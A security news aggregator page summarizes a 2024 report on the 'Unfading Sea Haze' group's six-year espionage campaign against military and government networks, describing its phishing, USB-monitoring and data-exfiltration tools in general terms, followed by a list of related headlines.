Security News > 2024 > May > Chinese hackers hide on military and govt networks for 6 years
Unfading Sea Haze attacks start with spear-phishing emails carrying malicious ZIP archives that contain LNK files disguised as documents.
In earlier attacks, the hacker also used Ps2dllLoader, a tool that loads.
Interestingly, a custom tool checks for newly plugged USB and Windows Portable Devices every ten seconds and sends device details and specific files to the attackers.
To exfiltrate data from breached systems, Unfading Sea Haze uses a custom tool named 'DustyExfilTool' that performs secure data extraction via TLS over TCP. More recent attacks show that the threat actors have switched to a curl utility and the FTP protocol for data exfiltration, now also using dynamically generated credentials that are changed frequently.
Unfading Sea Haze shows stealth, persistence, and adaptability, leveraging fileless attacks, advanced evasion methods, and modular malware design.
Kimsuky hackers deploy new Linux backdoor in attacks on South Korea.
News URL
Related news
- US says Chinese hackers breached multiple telecom providers (source)
- Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services (source)
- Microsoft: Chinese hackers use Quad7 botnet to steal credentials (source)
- Sophos reveals 5-year battle with Chinese hackers attacking network devices (source)
- Sophos Versus the Chinese Hackers (source)
- FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions (source)
- Chinese hackers exploit Fortinet VPN zero-day to steal credentials (source)
- Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign (source)
- Chinese hackers target Linux with new WolfsBane malware (source)
- Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries (source)